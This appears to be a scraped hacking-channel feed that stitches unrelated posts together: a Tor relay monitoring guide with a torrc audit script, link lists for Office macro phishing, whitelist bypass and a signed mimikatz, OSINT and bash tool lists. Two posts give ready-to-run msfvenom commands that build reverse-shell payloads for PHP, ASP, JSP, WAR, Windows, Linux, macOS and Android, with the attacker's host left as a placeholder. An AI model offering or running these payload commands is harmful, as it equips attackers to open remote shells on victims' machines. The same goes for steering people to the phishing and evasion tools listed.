Forwarded from Backup Legal Mega
4. Inspection and maintenance:
1) After the node is set up, use the "netstat -an" command to check whether the node's service listening port has established TCP connections.
2) It is also recommended to search for your own node in Tor Metrics, using its IP address or nickname as the keyword, to check its operating status. There, "Fingerprint" is the unique identity of the node and "Consensus Weight" is the node's path-selection weight (it depends on bandwidth and on how long the node has been running; the larger the number, the more likely the node is to be selected).
3) To monitor the node's running status and system resource usage in real time, it is recommended to install nyx:
> apt-get install nyx
> pip install nyx
> After the installation is complete, add the following parameters to the torrc file:
> ControlPort 9051
> CookieAuthentication 1
4) After the configuration is complete, start nyx directly in the terminal (note the user rights) and press the q key twice to exit.
WRITTEN BY UNDERCODE
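A check of the control-port settings from step 3, as an added example that is not part of the original post: it parses torrc text and flags a ControlPort that has no authentication configured or that listens beyond loopback. The function names and the second sample config are constructed for illustration.

```python
import ipaddress

def parse_torrc(text):
    """Map each option name (lower-cased, torrc names are case-insensitive) to its values."""
    opts = {}
    for raw in text.splitlines():
        parts = raw.split("#", 1)[0].split(None, 1)  # drop comments, split name from value
        if parts:
            opts.setdefault(parts[0].lower(), []).append(parts[1].strip() if len(parts) > 1 else "")
    return opts

def is_loopback(host):
    host = host.strip("[]")  # IPv6 literals are written as [::1]
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return host.lower() == "localhost"

def audit_control_port(text):
    """Return (code, message) findings for the control-port settings in torrc text."""
    opts = parse_torrc(text)
    ports = [v for v in opts.get("controlport", []) if v and v != "0"]
    if not ports:
        return [("DISABLED", "ControlPort is not set, so nyx has nothing to attach to")]
    findings = []
    cookie = opts.get("cookieauthentication", ["0"])[-1] == "1"
    hashed = any(opts.get("hashedcontrolpassword", []))
    if not (cookie or hashed):
        findings.append(("NO_AUTH", "any process that can reach the port controls Tor"))
    for value in ports:
        endpoint = value.split()[0]  # ignore trailing flags
        if endpoint == "auto" or endpoint.startswith("unix:"):
            continue
        host = endpoint.rpartition(":")[0]  # empty when only a port number is given
        if host and not is_loopback(host):
            findings.append(("EXPOSED", f"ControlPort {endpoint} listens beyond loopback"))
    return findings

# The settings from the post, and a constructed weak variant for comparison.
PAGE_TORRC = "ControlPort 9051\nCookieAuthentication 1\n"
WEAK_TORRC = "# constructed sample\nControlPort 0.0.0.0:9051\n"

if __name__ == "__main__":
    for name, cfg in (("page", PAGE_TORRC), ("weak", WEAK_TORRC)):
        print(name, audit_control_port(cfg) or "ok")
```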
#Exploits & #Bugs New:
[Exploiting CVE-2017-0199: HTA Handler Vulnerability](https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/)
CVE-2017-0199 Toolkit
[Window Signed Binary](https://github.com/vysec/Windows-SignedBinary)
Wepwnise
[Bash Bunny](https://hakshop.com/products/bash-bunny)
Generate Macro - Tool
[How To: Empire's Cross Platform Office Macro](https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/)
Excel macros with PowerShell
[PowerPoint and Custom Actions](https://phishme.com/powerpoint-and-custom-actions/)
MS Signed mimikatz in just 3 steps
[Hiding your process from sysinternals](https://riscybusiness.wordpress.com/2017/10/07/hiding-your-process-from-sysinternals/)
Luckystrike: An Evil Office Document Generator
[The Absurdly Underestimated Dangers of CSV Injection](http://georgemauer.net/2017/10/07/csv-injection.html)
Macro-less Code Exec in MSWord
[Multi-Platform Macro Phishing Payloads](https://medium.com/@malcomvetter/multi-platform-macro-phishing-payloads-3b688e8eff68)
Macroless DOC malware that avoids detection with Yara rule
[Empire without powershell](https://bneg.io/2017/07/26/empire-without-powershell-exe/)
Powershell without Powershell to bypass app whitelist
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
MDSec
Exploiting CVE-2017-0199: HTA Handler Vulnerability - MDSec
FireEye recently documented attacks of a 0-day vulnerability in the Windows HTA handler being exploited in the wild using Office RTF documents. The vulnerability later became referenced as CVE-2017-0199 and addressed...
Web #Payloads Commands Metasploit
1) msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php
2) Creates a Simple TCP Shell for PHP
3) msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp
4) Creates a Simple TCP Shell for ASP
5) msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp
6) Creates a Simple TCP Shell for Javascript
7) msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war
8) Creates a Simple TCP Shell for WAR
>git sources
Open Source #Threat Intelligence
- GOSINT - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence.
- Awesome Threat Intelligence - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it.
GitHub
GitHub - ciscocsirt/GOSINT: The GOSINT framework is a project used for collecting, processing, and exporting high quality indicators…
The GOSINT framework is a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). - ciscocsirt/GOSINT
IP address and DNS #Lookup Tools 2020:
- bgp
- Bgpview
- DataSploit (IP Address Modules)
- Domain Dossier
- Domaintoipconverter
- Googleapps Dig
- Hurricane Electric BGP Toolkit
- ICANN Whois
- Massdns
- Mxtoolbox
- Ultratools ipv6Info
- Viewdns
- Umbrella (OpenDNS) Popularity List
> git sources
bgpview.io
BGPView - BGP Toolkit and BGP ASN Routing Lookup Tool
BGPView allows you to debug and investigate information about IP addresses, ASN, IXs, BGP, ISPs, Prefixes and Domain names.
Public Pen Testing Reports recommended:
> The following are several resources that are useful when writing penetration testing reports, including many different examples:
1) Curated List of penetration testing reports | https://github.com/santosomar/public-pentesting-reports (forked from https://github.com/juliocesarfort/public-pentesting-reports) |
2) SANS guidance on writing penetration testing reports | https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 |
3) Offensive Security example | https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf |
4) PCI Security report guidance | https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf |
5) Dradis Framework | https://dradisframework.com/ce/ |
> git sources
GitHub
GitHub - santosomar/public-pentesting-reports: Curated list of public penetration test reports released by several consulting…
Curated list of public penetration test reports released by several consulting firms and academic security groups - santosomar/public-pentesting-reports
Creating Binaries with metasploit:
1) msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
- Creates a simple TCP Payload for Windows
2) msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
- Creates a simple HTTP Payload for Windows
3) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf
- Creates a simple TCP Shell for Linux
4) msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho
- Creates a simple TCP Shell for Mac
5) msfvenom -p android/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk
- Creates a simple TCP Payload for Android
#Shell Script Development:
- ansi - ANSI escape codes in pure bash - change text color, position the cursor, much more
- argbash - Bash argument parsing code generator
- assert.sh - Bash unit testing framework
- BashScriptTestingLibrary - A unit testing framework for Bash scripts
- bash3boilerplate - Templates to write better Bash scripts
- bashful - A collection of libraries to simplify writing Bash scripts
- bashmanager - mini bash framework for creating command line tools
- bats - Bash Automated Testing System
- bash_unit - bash unit testing enterprise edition framework for professionals
- mo - Mustache templates in pure bash
- semver_bash - Semantic Versioning in Bash
- shfmt - Format bash programs
- shunit2 - A unit test framework for Bash scripts with a flavour of JUnit/PyUnit
- bashing - Smashing Bash into Pieces - Bash framework for creating command line tools
- shellcheck - ShellCheck, a static analysis tool for shell scripts
>git sources
GitHub
GitHub - fidian/ansi: ANSI escape codes in pure bash - change text color, position the cursor, much more
ANSI escape codes in pure bash - change text color, position the cursor, much more - fidian/ansi
SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC).py
942 B
2020 Verified Cve SpotOutlook Crash 100/100
#Android Security Editing 2020 resources:
- Android Developer Studio
- APKtool
- dex2jar
- Bytecode Viewer
- IDA Pro
- Android Reverse Engineering Arsenals
Android Developers
Download Android Studio & App Tools - Android Developers
Android Studio provides app builders with an integrated development environment (IDE) optimized for Android apps. Download Android Studio today.